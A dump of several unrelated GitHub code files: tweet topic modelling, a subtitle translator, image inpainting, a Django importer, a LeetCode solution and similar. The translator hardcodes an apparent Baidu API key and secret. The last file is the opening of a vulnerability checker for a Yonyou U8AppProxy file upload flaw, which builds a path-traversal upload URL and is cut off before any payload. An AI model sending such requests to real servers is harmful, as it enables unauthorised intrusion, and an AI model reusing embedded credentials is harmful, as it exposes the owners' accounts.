tweets_and_topics = pd.DataFrame(np.round(lda_output, 2), columns=topicNames, index=tweetNames)\n\n # Get dominant topic for each tweet\n # Return topic for a certain tweet if probability to a certain topic is the highest\n tweet_dominant_topic = np.argmax(tweets_and_topics.values, axis=1)\n tweets_and_topics[\"dominant_topic\"] = tweet_dominant_topic\n\n # Print Overall Topic Distribution\n print(\"Topic Distribution\")\n df_topic_distribution = tweets_and_topics[\"dominant_topic\"].value_counts().reset_index(name=\"Num Documents\")\n df_topic_distribution.columns = [\"Topic Number\", \"Number of Tweets\"]\n print(df_topic_distribution)\n\n # Display word cloud\n displayWordcloud(ldaModel, tfFeatureNames)\n\n # Apply sentiment analysis to each constructed topics\n # returns tweetTokens and tweetDates\n # do this again to obtain tweet tokens in a format ready for sentiment analysis\n tweets = tp.getTweetDf(jsonFilename, removeFreqWords=True)\n\n # get sentiments for each tweet\n vaderSentiments = sa.vaderSentimentAnalysis(tweets[\"tweetTokens\"], printSentiment=False)\n\n # preprate data for plotting\n tweet_df = pd.DataFrame({\"Sentiments\": vaderSentiments,\n \"Date\": tweets[\"tweetDates\"],\n \"DominantTopic\": tweet_dominant_topic})\n tweet_df[\"Sentiments\"] = tweet_df[\"Sentiments\"].apply(pd.to_numeric)\n\n # distribution of sentiments across Topics\n g = ggplot(aes(x='Sentiments'), data=tweet_df) + \\\n geom_histogram() + \\\n facet_wrap('DominantTopic', nrow=3) + \\\n labs(x=\"Sentiment Score\", y=\"Frequency\")\n print(g)\n\n\n\ndef display_topics(model, featureNames, numTopWords):\n \"\"\"\n Prints out the most associated words for each feature.\n Note: method obtained from Lecturer Jeffrey Chan\n\n @param model: lda model.\n @param featureNames: list of strings, representing the list of features/words.\n @param numTopWords: number of words to print per topic.\n \"\"\"\n\n # print out the topic distributions\n for topicId, lTopicDist in enumerate(model.components_):\n print(\"Topic %d:\" % (topicId))\n print(\" \".join([featureNames[i] for i in lTopicDist.argsort()[:-numTopWords - 1:-1]]))\n\n\ndef displayWordcloud(model, featureNames):\n \"\"\"\n Displays the word 
cloud of the topic distributions, stored in model.\n    Note: method obtained from Lecturer Jeffrey Chan\n\n    @param model: lda model.\n    @param featureNames: list of strings, representing the list of features/words.\n    \"\"\"\n\n    # this normalises each row/topic to sum to one\n    normalisedComponents = model.components_ / model.components_.sum(axis=1)[:, np.newaxis]\n\n    topicNum = len(model.components_)\n    # number of wordclouds for each row\n    plotColNum = 2\n    # number of wordclouds for each column\n    plotRowNum = int(math.ceil(topicNum / plotColNum))\n\n    # plot each wordcloud\n    for topicId, lTopicDist in enumerate(normalisedComponents):\n        lWordProb = {featureNames[i] : wordProb for i, wordProb in enumerate(lTopicDist)}\n        wordcloud = WordCloud(background_color='white')\n        wordcloud.fit_words(frequencies=lWordProb)\n        plt.subplot(plotRowNum, plotColNum, topicId+1)\n        plt.title('Topic %d:' % (topicId))\n        plt.imshow(wordcloud, interpolation='bilinear')\n        plt.axis(\"off\")\n    plt.show(block=True)\n\n\nif __name__ == '__main__':\n    main()\n\n","repo_name":"adelbertchoi/social-media-analysis-twitter-data","sub_path":"topicModelling.py","file_name":"topicModelling.py","file_ext":"py","file_size_in_byte":5806,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
{"seq_id":"73095768567","text":"import http.client\nimport hashlib\nimport urllib\nimport random\nimport json\nimport re\nimport toml\n\n\ndef translate(q, from_lang='auto', to_lang='zh'):\n    app_id = '20200108000373970' # Fill in your appid\n    secret_key = 'wovG1CuvOYi9DOYKJPgM' # Fill in your secret key\n\n    httpClient = None\n    myurl = '/api/trans/vip/translate'\n    salt = random.randint(32768, 65536)\n    sign = app_id + q + str(salt) + secret_key\n    sign = hashlib.md5(sign.encode()).hexdigest()\n    myurl = myurl + '?appid=' + app_id + '&q=' + urllib.parse.quote(\n        q) + '&from=' + from_lang + '&to=' + to_lang + '&salt=' + str(\n        salt) + '&sign=' + sign\n\n    try:\n        httpClient = http.client.HTTPConnection('api.fanyi.baidu.com')\n        httpClient.request('GET', myurl)\n\n        # response is an HTTPResponse object\n        response = httpClient.getresponse()\n        result_all = response.read().decode(\"utf-8\")\n        result = json.loads(result_all)\n        dst = result[\"trans_result\"][0][\"dst\"]\n        return dst\n\n    except Exception as e:\n        print(e)\n\n    finally:\n        if httpClient:\n            httpClient.close()\n\n\ndef delete_end_punc(str): # Delete punctuations at the end of sentences\n    punctuation = ',。?!;:,.?!:;'\n    return re.sub(re.compile(r'[{}]+$'.format(punctuation)), \"\", str)\n\n\ndef srt_trans_srt_by_one(input_file, from_lang, to_lang='zh', bi_sub=True):\n    with open(input_file, 'r', encoding='utf-8') as f_in:\n        output_file = input_file[:-4] + '_trans' + input_file[-4:]\n        with open('Output/' + output_file, 'w', encoding='utf-8') as f_out:\n            for line in f_in:\n                pattern = re.compile('^\\d*$|\\d{2}:\\d{2}:\\d{2},\\d{3}')\n                if re.match(pattern, line):\n                    f_out.write(line)\n                else:\n                    line_trans = translate(line.strip(), from_lang, to_lang)\n                    print(line_trans)\n                    if bi_sub:\n                        f_out.write(line)\n                    f_out.write(line_trans + '\\n')\n\n\ndef srt_trans_srt(input_file, from_lang, to_lang='zh', bi_sub=True, from_lang_top=True):\n    \"\"\"\n    Translate the language in the input file into another language\n    :param input_file: the srt file to be translated\n    :param from_lang: the language of the input file\n    :param to_lang: the language of the output file\n    :param bi_sub: whether to use a bi-language subtitle\n    :param from_lang_top: whether from_lang subtitles are higher than to_lang subtitles in the output file\n    
\"\"\"\n sub_list, format_list = [], []\n name = re.search(re.compile(r'\\w+(?=\\.)'), input_file).group()\n if bi_sub:\n if from_lang_top:\n output_file = '{}_{}_{}.srt'.format(name, from_lang, to_lang)\n else:\n output_file = '{}_{}_{}.srt'.format(name, to_lang, from_lang)\n else:\n output_file = '{}_{}.srt'.format(name, to_lang)\n\n with open(input_file, 'r', encoding='utf-8') as f_in:\n for line in f_in:\n if re.match(re.compile(r'^\\d+\\n$'), line):\n format_list.append(line)\n elif re.match(re.compile(r'^\\d{2}:\\d{2}:\\d{2},\\d{3}'), line):\n format_list[-1] += line\n elif line == '\\n':\n continue\n else:\n sub_list.append(line.strip())\n sep = '. one. '\n text = sep.join(sub_list)\n text_trans = translate(text, from_lang, to_lang)\n trans_list = text_trans.split('一个。')\n\n if not len(format_list) == len(sub_list) == len(trans_list):\n print('Length not match!')\n else:\n with open('Output/' + output_file, 'w', encoding='utf-8') as f_out:\n for i, line in enumerate(format_list):\n f_out.write(format_list[i])\n trans_line = delete_end_punc(trans_list[i])\n if bi_sub:\n if from_lang_top:\n f_out.write(sub_list[i] + '\\n')\n f_out.write(trans_line + '\\n\\n')\n else:\n f_out.write(trans_line + '\\n')\n f_out.write(sub_list[i] + '\\n\\n')\n else:\n f_out.write(trans_line + '\\n\\n')\n return output_file\n\n\ndef srt_t2ass_t(time):\n time_list = list(map(int, re.split(re.compile('[^0-9]+'), time)))\n ms_s = time_list[3] + time_list[2] * 1000 + time_list[1] * 1000 * 60 + time_list[0] * 1000 * 60 * 60\n ms_e = time_list[7] + time_list[6] * 1000 + time_list[5] * 1000 * 60 + time_list[4] * 1000 * 60 * 60\n ms_sr = int(round(ms_s / 10) * 10)\n ms_er = int(round(ms_e / 10) * 10)\n hour_s = ms_sr // (1000 * 60 * 60)\n hour_e = ms_er // (1000 * 60 * 60)\n minute_s = ms_sr % (1000 * 60 * 60) // (1000 * 60)\n minute_e = ms_er % (1000 * 60 * 60) // (1000 * 60)\n second_s = ms_sr % (1000 * 60 * 60) % (1000 * 60) // 1000\n second_e = ms_er % (1000 * 60 * 60) % (1000 * 60) // 1000\n cs_s = ms_sr % (1000 * 60 * 60) % (1000 * 60) % 1000 // 10\n cs_e = ms_er % (1000 * 60 * 60) % (1000 * 60) % 1000 // 10\n ass_s = '{}:{}:{}.{},'.format(str(hour_s), str(minute_s).zfill(2), str(second_s).zfill(2), str(cs_s).zfill(2))\n ass_e = '{}:{}:{}.{}'.format(str(hour_e), str(minute_e).zfill(2), str(second_e).zfill(2), str(cs_e).zfill(2))\n return ass_s + ass_e\n\n\ndef srt2ass(input_file, language, swap=False):\n \"\"\"\n Convert srt to ass\n :param input_file:\n :param language: the language of the input srt file. ex. 
'zh_en'\n :param swap: whether transform the position of the two subtitle layers in different languages\n \"\"\"\n config = toml.load('config.toml')\n time_list = []\n output_file = re.search(re.compile(r'[^/]+\\.'), input_file).group() + 'ass'\n\n if len(language) > 2 and re.search(re.compile('zh'), language):\n high_line, low_line = language[:2] + '_line', language[-2:] + '_line'\n high_sub_list, low_sub_list = [], []\n with open(input_file, 'r', encoding='utf-8') as f_in:\n sub_flag = 0\n for line in f_in:\n if re.search(re.compile(r'^\\d*\\n$'), line):\n continue\n elif re.search(re.compile(r'^\\d{2}:\\d{2}:\\d{2},\\d{3}'), line) and not sub_flag:\n time_list.append(line.strip())\n sub_flag = 1\n elif sub_flag == 1:\n high_sub_list.append(line)\n sub_flag = 2\n elif sub_flag == 2:\n low_sub_list.append(line)\n sub_flag = 0\n else:\n print('Unidentified line: {}'.format(line))\n if not len(time_list) == len(high_sub_list) == len(low_sub_list):\n print('Length not match!')\n else:\n with open('Output/' + output_file, 'w', encoding='utf-8') as f_out:\n if language == 'zh_en' or language == 'en_zh':\n if swap:\n language = language[-2:] + '_' + language[:2]\n f_out.write(config[language + '_ass']['header'] + '\\n')\n for i, line in enumerate(time_list):\n ass_t = srt_t2ass_t(time_list[i])\n ass_t_p = re.compile(r'\\d+:\\d{2}:\\d{2}.\\d{2},\\d+:\\d{2}:\\d{2}.\\d{2}')\n high_sub = re.sub(ass_t_p, ass_t, config[language + '_ass'][high_line]) + high_sub_list[i]\n low_sub = re.sub(ass_t_p, ass_t, config[language + '_ass'][low_line]) + low_sub_list[i]\n if swap:\n f_out.write(low_sub)\n f_out.write(high_sub)\n else:\n f_out.write(high_sub)\n f_out.write(low_sub)\n\n\ndef srt_trans_ass(input_file, from_lang, to_lang='zh', bi_sub=True, from_lang_top=True):\n trans = srt_trans_srt(input_file, from_lang, to_lang, bi_sub, from_lang_top)\n language = re.search(re.compile(r'(_[a-z]{2}){1,2}(?=\\.)'), trans).group()[1:]\n srt2ass(trans, language)\n\n\ninput_srt = 'D:/Category/Video/ZBrush 2020从入门到精通全方位训练课ZBrush 2020 Essential Training/002 - Preparing for this course.srt'\nsrt2ass(input_srt, 'zh_en', swap=True)\n# srt_trans_srt(input_srt)\n# input_srt = 'Output/16_trans.srt'\n# srt2ass(input_srt, 'en_zh')\n","repo_name":"hooyuser/SubTranslator","sub_path":"SubTranslator.py","file_name":"SubTranslator.py","file_ext":"py","file_size_in_byte":8304,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"19187981796","text":"import argparse\nimport tensorflow as tf\nimport numpy as np\nfrom inpainter import ImageInpaint\nfrom completion_net import CompletionNetwork\nfrom gan import LocalDiscriminator, GlobalDiscriminator\n\ndef parse_args():\n parser = argparse.ArgumentParser(description=\"Arg Parser\", formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('--task', required=True, choices=['train', 'test', 'both'], help='training or testing (a saved model)')\n parser.add_argument('--checkpoint_path', default='', help='saved model location')\n \n return parser.parse_args()\n\ndef get_data():\n (training_images, _), (test_images, _) = tf.keras.datasets.cifar100.load_data()\n return training_images, test_images\n\ndef compile_model(model):\n from utils.losses import completion_loss, discriminator_loss, joint_loss\n\n optimizer = tf.keras.optimizers.Adam()\n losses = [tf.keras.losses.MeanSquaredError(reduction=tf.keras.losses.Reduction.SUM), discriminator_loss, joint_loss]\n acc = None # fill in later with dice coeff\n\n 
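    # --- Editor's note (sketch, not from the original repo) ---
    # `acc` is left as None above with a "fill in later with dice coeff" marker.
    # A minimal Dice-coefficient metric could look like the sketch below, assuming
    # TensorFlow tensors scaled to [0, 1]; the names `dice_coeff` and `smooth`
    # are illustrative assumptions, not part of the original code:
    #
    #     def dice_coeff(y_true, y_pred, smooth=1e-6):
    #         # Flatten both tensors and compute 2*|X n Y| / (|X| + |Y|).
    #         y_true = tf.reshape(tf.cast(y_true, tf.float32), [-1])
    #         y_pred = tf.reshape(tf.cast(y_pred, tf.float32), [-1])
    #         intersection = tf.reduce_sum(y_true * y_pred)
    #         return (2.0 * intersection + smooth) / (
    #             tf.reduce_sum(y_true) + tf.reduce_sum(y_pred) + smooth)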
model.compile(\n        optimizer = optimizer,\n        losses = losses,\n        metrics = [acc]\n    )\n\ndef load_model(checkpoint):\n    model = tf.keras.models.load_model(checkpoint, \n        custom_objects = dict(\n            CompletionNetwork = CompletionNetwork,\n            LocalDiscriminator = LocalDiscriminator,\n            GlobalDiscriminator = GlobalDiscriminator\n        ),\n        compile = False)\n\n    from functools import partial\n    model.test = partial(ImageInpaint.test, model)\n    model.train = partial(ImageInpaint.train, model)\n    model.compile = partial(ImageInpaint.compile, model)\n    model.update_variables = partial(ImageInpaint.update_variables, model)\n    \n    return model\n\ndef train(model, train_images, batch_size, T_C, T_D, T, restore):\n\n    # note: apply data augmentation before training\n    try:\n        augment_fn = tf.keras.Sequential([\n            tf.keras.layers.RandomFlip(\"horizontal_and_vertical\"),\n            tf.keras.layers.RandomContrast(0.10)\n        ])\n        model.train(train_images, batch_size, T_C, T_D, T, augment_fn, restore=restore)\n    except KeyboardInterrupt as e:\n        print(\"\\nKeyboard interruption\")\n\ndef test(model, test_images):\n    model.test()\n    # initialize stats, test the model, print out the stats at the end\n    pass\n\nif __name__ == '__main__':\n\n    # for now you can just run train.py w/o providing any command line arguments\n    batch_size = 25\n    #T_C, T_D, T = 1800, 200, 12000\n    T_C, T_D, T = 1800, 200, 3000\n\n    args = parse_args()\n    test_images = None\n\n    # for training, add `--task train --checkpoint_path ./model`\n    if (args.task == 'train' or args.task == 'both'):\n        train_images, test_images = get_data()\n        np.random.shuffle(train_images)\n        model = ImageInpaint()\n        \n        compile_model(model)\n        train(model, train_images, batch_size, T_C, T_D, T, True)\n        \n        if (args.checkpoint_path):\n            model(tf.random.normal((1,32,32,3)))\n            tf.keras.models.save_model(model, args.checkpoint_path)\n        \n    if (args.task == 'test' or args.task == 'both'):\n        if (args.checkpoint_path):\n            if (test_images is None):\n                _, test_images = get_data()\n\n            model = load_model(args.checkpoint_path)\n            test(model, test_images)\n        else:\n            print(\"ERROR: Need to provide checkpoint path!\")","repo_name":"evwlu/image-inpainting","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3437,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
{"seq_id":"4892708536","text":"import logging\nimport xlrd\n\nfrom collections import OrderedDict\n\nfrom django.db import transaction\nfrom django.forms.utils import ErrorDict\n\nfrom catalog.forms import CatalogItemImportForm\n\n\nIMPORT_COLUMN_NAMES = [\n    'item_code',\n    'item_category',\n    'description',\n    'donor',\n    'donor_t1',\n    'supplier',\n    'weight',\n    'unit',\n    'price_local',\n    'price_usd',\n]\n\n# Give up import after this many errors\nMAX_IMPORT_ERRORS = 50\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass CatalogImportFailure(Exception):\n    def __init__(self, errlist):\n        self.errlist = errlist\n\n\nclass SimpleSheet(object):\n    \"\"\"\n    Simplified interface to a sheet in an Excel spreadsheet.\n    \"\"\"\n    def __init__(self, filename, sheet_number):\n        try:\n            book = xlrd.open_workbook(filename)\n        except xlrd.XLRDError as e:\n            raise CatalogImportFailure(errlist=e.args)\n        if sheet_number >= book.nsheets:\n            raise ValueError(\"No sheet number %d in this spreadsheet\" % sheet_number)\n        self.sheet = book.sheet_by_index(sheet_number)\n        if not self.sheet.nrows:\n            raise ValueError(\"Sheet %d has no rows\" % sheet_number)\n\n    def column_names(self):\n        \"\"\"\n        Return values from first row\n        \"\"\"\n        
return self.sheet.row_values(0)\n\n def rows(self):\n \"\"\"\n Generator that returns (row_number, ordered_dictionary_of_values) for each row.\n The row number is what a human would see, e.g. 1-based index.\n The first row - assumed to have column names - is omitted from this method's results.\n \"\"\"\n names = self.column_names()\n for row_index in range(1, self.sheet.nrows):\n values = self.sheet.row_values(row_index)\n d = OrderedDict()\n for name, value in zip(names, values):\n d[name] = value\n yield (row_index + 1, d)\n\n\ndef format_form_errors(row_number, form):\n \"\"\"\n Return form errors as a list of strings.\n \"\"\"\n if isinstance(form.errors, ErrorDict):\n # keys are the field names\n errlist = []\n for field_name, list_of_errors in form.errors.items():\n for e in list_of_errors:\n if field_name == '__all__':\n errlist.append('row %d: %s' % (row_number, e))\n else:\n errlist.append('row %d: field %s: %s' % (row_number, field_name, e))\n return errlist\n\n\ndef catalog_import(path):\n \"\"\"\n Import catalog items from a spreadsheet in the file at the given path.\n\n Assumes the first sheet has the data, the first row is the column names, and\n the columns we want to import have the same names as the fields in the model.\n\n If anything fails, raises CatalogImportFailure.\n\n If successful, returns the number of items imported\n \"\"\"\n\n # It's not really necessary to break this code up into separate functions, but\n # it'll simplify testing.\n try:\n sheet = SimpleSheet(path, 0)\n except ValueError as e:\n raise CatalogImportFailure(errlist=e.args)\n return _catalog_import_from_simple_sheet(sheet)\n\n\ndef _catalog_import_from_simple_sheet(sheet):\n \"\"\"import catalog items from a SimpleSheet instance\"\"\"\n\n # Make sure expected columns exist\n columns_not_found = (set(IMPORT_COLUMN_NAMES)\n - set(sheet.column_names()))\n if columns_not_found:\n missing_cols = '%s ' * len(columns_not_found) % tuple(columns_not_found)\n raise CatalogImportFailure(errlist=[\"Some columns not found: %s\" % missing_cols])\n\n # Start importing\n num_new = 0\n errors = []\n # import all, or none\n with transaction.atomic():\n for row_number, values in sheet.rows():\n try:\n num_new += 1\n form = CatalogItemImportForm(data=values)\n if form.is_valid():\n form.save()\n else:\n errors.extend(format_form_errors(row_number, form))\n if len(errors) >= MAX_IMPORT_ERRORS:\n errors.append(\"Giving up after %d errors\" % MAX_IMPORT_ERRORS)\n break\n except Exception as e:\n logger.exception(\"Importing %r\" % values)\n errors.append(\"row %d: %s\" % (row_number, e))\n if errors:\n raise CatalogImportFailure(errors)\n return num_new\n","repo_name":"theirc/CTS","sub_path":"catalog/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4419,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"77"} +{"seq_id":"31773711693","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis script is an example on how to use the library ``nsc.py``\r\nto use the NSC method to get self-calibrated null depth.\r\n\"\"\"\r\n\r\nfrom ndps_core import run_ndps\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nprint('Start')\r\n# =============================================================================\r\n# Settings\r\n# =============================================================================\r\n# Attempt to deconvolve dark noise from photometries by assuming dark\r\n# and photometry to be normally distributed\r\nactivate_dark_correction = False\r\n# 
Activate the frame sorting to remove frames with non_Gaussian phase events\r\nactivate_phase_sorting = True\r\n# Use a linear model of the null depth instead of the exact one\r\nactivate_linear_model = False\r\n# Oversampling all spectral channels in MC to mimic temporal loss of coherence\r\nactivate_oversampling = True\r\n# Display null/antinull outputs vs time for setting the sorting parameters\r\nactivate_preview_only = False\r\n# Activate basin-hopping strategy for finding the global minimum in fit\r\nactivate_random_init_guesses = True\r\n# Deconvolve photometries after assuming they follow a Normal distribution.\r\nactivate_photo_resampling = False\r\n# Calculate the null depth in the old-fashioned way (cf Hanot et al. (2011))\r\nactivate_save_classic_esti = False\r\n#\r\nactivate_spectral_sorting = False\r\nactivate_spectral_binning = False\r\nactivate_time_binning_photometry = True\r\nactivate_use_antinull = True\r\nactivate_use_photometry = False\r\nactivate_remove_dark = False\r\nactivate_draw_model = True\r\nactivate_lbti_mode = False\r\nactivate_rvu = True\r\n# Use the measured zeta coeff. If False, value are set to 0.5\r\nactivate_zeta = True\r\n# Do not do fit\r\nskip_fit = False\r\n# Explore parameter space instead of fit\r\nchi2_map_switch = False\r\n# Map the parameters space over astronull, DeltaPhi mu and sigma\r\nmap_na_sz = 10\r\nmap_mu_sz = 80\r\nmap_sig_sz = 10\r\n# Binning the frames before any calculation\r\nglobal_binning = 1\r\n# Total number of elements to generate for the MC\r\nn_samp_total = int(1e+7)\r\n# Number of samples per loop to relieve computation power\r\nn_samp_per_loop = int(1e+7)\r\n# Number of frames to bin before doing the sorting\r\nnb_frames_sorting_binning = 100\r\n# Number of frames to bin to go toward a dark-free histogram of injection\r\nnb_frames_binning_photometry = -1\r\n# Choice of optimizer\r\nselect_optimizer = 0 # 0 = Chi2, 1 = lklh\r\n\r\n# Which data files to load\r\n# supercount = 1\r\n# z = supercount * 100\r\n# for k in range(z, z+1):\r\nfor supercount in range(2, 3):\r\n plt.close('all')\r\n z = supercount * 100\r\n k = z\r\n nb_files_data = (0, None)\r\n # Which dark files to load\r\n nb_files_dark = (0, None)\r\n # lower and upper bound of the iteration loop for basin hopping method\r\n basin_hopping_nloop = (10*k, 10*k+10)\r\n # Baselines to process\r\n which_nulls = ['null6']\r\n \r\n # Lower bound of the bandwidth to process\r\n wl_min = 1525\r\n # Upper bound of the bandwidth to process\r\n wl_max = 1575\r\n \r\n activates = (activate_dark_correction, activate_phase_sorting, activate_linear_model,\r\n activate_oversampling, activate_preview_only,\r\n activate_random_init_guesses, activate_photo_resampling,\r\n activate_save_classic_esti, activate_spectral_sorting,\r\n activate_spectral_binning, activate_time_binning_photometry,\r\n activate_use_antinull, activate_use_photometry,\r\n activate_zeta, activate_remove_dark, activate_draw_model, activate_lbti_mode,\r\n select_optimizer, activate_rvu)\r\n \r\n maps_sz = (map_na_sz, map_mu_sz, map_sig_sz)\r\n \r\n nbs = (global_binning, n_samp_total, n_samp_per_loop,\r\n nb_frames_sorting_binning,\r\n nb_frames_binning_photometry, nb_files_data, nb_files_dark,\r\n basin_hopping_nloop)\r\n \r\n wl_minmax = (wl_min, wl_max)\r\n \r\n \r\n out = run_ndps(activates, skip_fit, chi2_map_switch, maps_sz, nbs, which_nulls,\r\n wl_minmax, 
supercount)\r\n","repo_name":"mamartinod/ndps","sub_path":"run_ndps.py","file_name":"run_ndps.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43373215078","text":"# You are visiting a farm that has a single row of fruit trees arranged from left to right.\n# The trees are represented by an integer array fruits where fruits[i] is the type of fruit the ith tree produces.\n# You want to collect as much fruit as possible.\n# However, the owner has some strict rules that you must follow:\n# - You only have two baskets, and each basket can only hold a single type of fruit.\n# There is no limit on the amount of fruit each basket can hold.\n# - Starting from any tree of your choice, you must pick exactly one fruit from every tree\n# (including the start tree) while moving to the right. The picked fruits must fit in one of your baskets.\n# - Once you reach a tree with fruit that cannot fit in your baskets, you must stop.\n# Given the integer array fruits, return the maximum number of fruits you can pick.\n# --------------------\n# 1 <= fruits.length <= 10 ** 5\n# 0 <= fruits[i] < fruits.length\nfrom random import randint\n\n\ndef total_fruit(fruits: list[int]) -> int:\n # working_sol (77.79%, 55.45%) -> (754ms, 22.5mb) time: O(n) | space: O(n)\n if len(fruits) == 1:\n return 1\n # ! 0 <= fruits[i] < fruits.length !\n # No reasons for a dict.\n gathered: list[int] = [0 for _ in fruits]\n type1: int = -1\n type2: int = -1\n # Standard sliding window.\n l_limit: int = 0\n r_limit: int = 0\n max_fruits: int = 0\n # Expand and count while we can.\n while r_limit != len(fruits):\n if fruits[r_limit] == type1:\n gathered[type1] += 1\n elif fruits[r_limit] == type2:\n gathered[type2] += 1\n elif type1 == -1:\n type1 = fruits[r_limit]\n gathered[type1] += 1\n elif type2 == -1:\n type2 = fruits[r_limit]\n gathered[type2] += 1\n # Shrink when encounter different type3.\n elif fruits[r_limit] != type1 or fruits[r_limit] != type2:\n # We need to reassign type1 or type2 to a new type.\n # Exhaust one of them.\n while gathered[type1] != 0 and gathered[type2] != 0:\n gathered[fruits[l_limit]] -= 1\n l_limit += 1\n # And reassign.\n if gathered[type1] == 0:\n type1 = fruits[r_limit]\n gathered[type1] += 1\n if gathered[type2] == 0:\n type2 = fruits[r_limit]\n gathered[type2] += 1\n # 0-indexed, +1 for correct length.\n max_fruits = max(max_fruits, (r_limit - l_limit) + 1)\n r_limit += 1\n return max_fruits\n\n\n# Time complexity: O(n) -> worst case == continuous sub until last element, so we will extra delete every index once\n# n - len of input_array^^| until n - 2 => O(n + (n - 2)) => O(n).\n# Auxiliary space: O(n) -> creating extra array with same size as input_array => O(n).\n\n\ntest: list[int] = [1, 2, 1]\ntest_out: int = 3\nassert test_out == total_fruit(test)\n\ntest = [0, 1, 2, 2]\ntest_out = 3\nassert test_out == total_fruit(test)\n\ntest = [1, 2, 3, 2, 2]\ntest_out = 4\nassert test_out == total_fruit(test)\n\ntest = [randint(0, 10 ** 3 - 1) for _ in range(10 ** 3)]\nprint(test)\n","repo_name":"Massprod/leetcode-testing","sub_path":"leetcode_problems/p904_fruit_into_baskets.py","file_name":"p904_fruit_into_baskets.py","file_ext":"py","file_size_in_byte":3124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39293706225","text":"# coding: utf-8\nimport datetime\nimport logging\nfrom logging import Handler\n\nimport opentracing\n\nfrom 
tracing import tags\n\n\nclass ErrorTraceHandler(Handler):\n    \"\"\"\n    Custom StreamHandler implementation to forward python logger records to Jaeger / OpenTracing\n    \"\"\"\n    def __init__(self, level=logging.ERROR):\n        \"\"\"\n        Initialize the handler.\n\n        If stream is not specified, sys.stderr is used.\n        \"\"\"\n        super().__init__(level)\n\n    def emit(self, record):\n        try:\n            msg = self.format(record)\n            operation_name = 'logger[{}]'.format(record.name)\n            parent_span = opentracing.tracer.active_span\n            if not parent_span:\n                return\n            with opentracing.tracer.start_span(operation_name, child_of=parent_span) as logger_span:\n                logger_span.set_tag(tags.SPAN_KIND, tags.SPAN_KIND_LOG)\n                logger_span.set_tag(tags.LOGGER, record.name)\n\n                logger_span.log_kv({\n                    'event': tags.LOG_ERROR,\n                    'message': msg,\n                    'log.stack_info': record.stack_info,\n                    'log.asctime': getattr(record, 'asctime', datetime.datetime.now()),\n                    'log.created': record.created,\n                    'log.filename': record.filename,\n                    'log.funcName': record.funcName,\n                    'log.levelname': record.levelname,\n                    'log.lineno': record.lineno,\n                    'log.module': record.module,\n                    'log.msecs': record.msecs,\n                    'log.name': record.name,\n                    'log.pathname': record.pathname,\n                    'log.process': record.process,\n                    'log.thread': record.thread\n                })\n        except Exception as e:\n            self.handleError(record)\n","repo_name":"pushiqiang/jaeger_flask_django","sub_path":"tracing/logger_handler.py","file_name":"logger_handler.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"77"}
{"seq_id":"26105144629","text":"# -*- coding: utf-8 -*-\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets import load_iris\n\n\niris = load_iris()\n\niris_df = pd.DataFrame(iris.data, columns=iris.feature_names)\n\nfrom sklearn.model_selection import train_test_split\nfeatures_train, features_test = train_test_split(iris_df, test_size = 0.1, random_state = 0)\n\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\n\nfeatures_train = sc.fit_transform(features_train)\nfeatures_test = sc.transform(features_test)\n\nfrom sklearn.decomposition import PCA\npca = PCA(n_components = 2)\nfeatures_train = pca.fit_transform(features_train)\nfeatures_test = pca.transform(features_test)\nexplained_variance = pca.explained_variance_ratio_\n\nfrom sklearn.cluster import KMeans\nkmeans = KMeans(n_clusters = 3, init = 'k-means++', random_state = 0)\npred_cluster = kmeans.fit_predict(features_train)\n\nplt.scatter(features_train[pred_cluster == 0, 0], features_train[pred_cluster == 0, 1], c = 'blue', label = 'Cluster 1')\nplt.scatter(features_train[pred_cluster == 1, 0], features_train[pred_cluster == 1, 1], c = 'red', label = 'Cluster 2')\nplt.scatter(features_train[pred_cluster == 2, 0], features_train[pred_cluster == 2, 1], c = 'green', label = 'Cluster 3')\nplt.scatter(kmeans.cluster_centers_[:, 0], kmeans.cluster_centers_[:, 1], c = 'yellow', label = 'Centroids')\nplt.title('Clusters of datapoints')\nplt.xlabel('X Coordinates')\nplt.ylabel('Y Coordinates')\nplt.legend()\nplt.show()\n","repo_name":"pulkitmathur10/FSBC2019","sub_path":"Day 24/iris_red.py","file_name":"iris_red.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"73934768567","text":"#! 
python3\r\n\r\n\"\"\"\r\n\r\n@FileName: 用友 GRP-U8 U8AppProxy\r\n@Author: londly\r\n@Datetime: 20230316\r\n\r\n\"\"\"\r\nimport argparse\r\nfrom optparse import OptionParser\r\nfrom urllib.parse import urljoin\r\nimport requests\r\nimport sys\r\n\r\nfrom termcolor import cprint\r\n\r\nrequests.packages.urllib3.disable_warnings()\r\n\r\ndef banner():\r\n print('''\r\n ***************************************************************\r\n 用友NC U8AppProxy 任意文件上传漏洞检测工具\r\n Author: londly\r\n First Date: 2023/03/18\r\n ***************************************************************\r\n \r\n *************************警 告*********************************\r\n 本工具旨在帮助企业快速定位漏洞、修复漏洞,仅限授权安全测试使用!\r\n 请严格遵守《中华人民共和国网络安全法》,禁止未授权非法攻击站点!\r\n ***************************************************************\r\n \r\n \r\n ''');\r\n\r\ndef main(url):\r\n print(\"[-]正在检测用友NC U8AppProxy是否存在任意文件上传漏洞\")\r\n target = urljoin(url, \"/U8AppProxy?gnid=myinfo&id=saveheader&zydm=../../hello_U8\")\r\n headers = {\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 